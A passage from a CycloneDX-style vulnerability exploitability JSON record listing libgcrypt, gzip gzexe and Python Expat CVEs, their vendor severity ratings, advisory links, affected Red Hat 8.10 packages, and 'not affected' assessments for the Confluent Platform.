        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-41989"
        },
        {
          "url": "https://dev.gnupg.org/T8211"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-50144.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:50147"
        },
        {
          "url": "https://github.com/advisories/GHSA-wrv8-79m2-qg24"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-41989.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-50147-0.html"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2026q2/000503.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41989"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8319-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41989"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/21/1"
        }
      ],
      "published": "2026-04-23T05:16:05+00:00",
      "updated": "2026-07-14T13:18:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.8.5-7.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41990",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        787
      ],
      "description": "Libgcrypt before 1.12.2 mishandles Dilithium signing. Writes to a static array lack a bounds check but do not use attacker-controlled data.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41990"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41990"
        },
        {
          "url": "https://dev.gnupg.org/T8208"
        },
        {
          "url": "https://github.com/advisories/GHSA-78pv-qq8x-94px"
        },
        {
          "url": "https://lists.gnupg.org/pipermail/gnupg-announce/2026q2/000503.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41990"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8319-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41990"
        },
        {
          "url": "https://www.openwall.com/lists/oss-security/2026/04/21/1"
        }
      ],
      "published": "2026-04-23T05:16:05+00:00",
      "updated": "2026-06-17T10:47:18+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.8.5-7.el8_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libgcrypt@1.8.5-7.el8_6?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-41991",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        377
      ],
      "description": "GNU gzip contains a vulnerability in the gzexe utility related to insecure temporary file handling. When the mktemp utility is not available in the user\u2019s PATH, gzexe falls back to constructing a temporary file path based solely on the process ID (PID). This predictable filename is created without exclusive access or existence checks.\nA local attacker can pre\u2011create the predicted temporary file path as a symbolic link pointing to an arbitrary file writable by the victim. When gzexe runs, it follows the symlink and overwrites the target file, resulting in a time\u2011of\u2011check to time\u2011of\u2011use (TOCTOU) condition that allows arbitrary file overwrite.\n\nThis issue has been fixed in the commit 4e6f8b24ab823146ab8776f0b7fe486ab34d4269",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-41991"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-41991"
        },
        {
          "url": "https://cert.pl/en/posts/2026/04/CVE-2026-41991"
        },
        {
          "url": "https://cert.pl/en/posts/2026/04/CVE-2026-41991/"
        },
        {
          "url": "https://cgit.git.savannah.gnu.org/cgit/gzip.git/commit/?id=4e6f8b24ab823146ab8776f0b7fe486ab34d4269"
        },
        {
          "url": "https://github.com/advisories/GHSA-67v8-88jf-4x6q"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41991"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8512-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-41991"
        },
        {
          "url": "https://www.gnu.org/software/gzip"
        },
        {
          "url": "https://www.gnu.org/software/gzip/"
        }
      ],
      "published": "2026-06-29T12:16:29+00:00",
      "updated": "2026-07-01T14:02:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.9-13.el8_5",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/gzip@1.9-13.el8_5?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-4224",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "When an Expat parser with a registered ElementDeclHandler parses an inline\ndocument type definition containing a deeply nested content model a C stack\noverflow occurs.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4224"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/16/4"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4224"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/196edfb06a7458377d4d0f4b3cd41724c1f3bd4a"
        },
        {
          "url": "https://github.com/python/cpython/commit/24ce88b285f56ee11626cf5e472af3cd8cc7c621"
        },
        {
          "url": "https://github.com/python/cpython/commit/642865ddf4b232da1f3b1f7abcfa3254c4bfe785"
        },
        {
          "url": "https://github.com/python/cpython/commit/af856a7177326ac25d9f66cc6dd28b554d914fee"
        },
        {
          "url": "https://github.com/python/cpython/commit/e0a8a6da90597a924b300debe045cdb4628ee1f3"
        },
        {
          "url": "https://github.com/python/cpython/commit/eb0e8be3a7e11b87d198a2c3af1ed0eccf532768"
        },
        {
          "url": "https://github.com/python/cpython/issues/145986"
        },
        {
          "url": "https://github.com/python/cpython/pull/145987"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-4224.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/5M7CGUW3XBRY7II4DK43KF7NQQ3TPZ6R/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4224"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4224"
        }
      ],
      "published": "2026-03-16T18:16:10+00:00",
      "updated": "2026-08-13T01:16:53+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
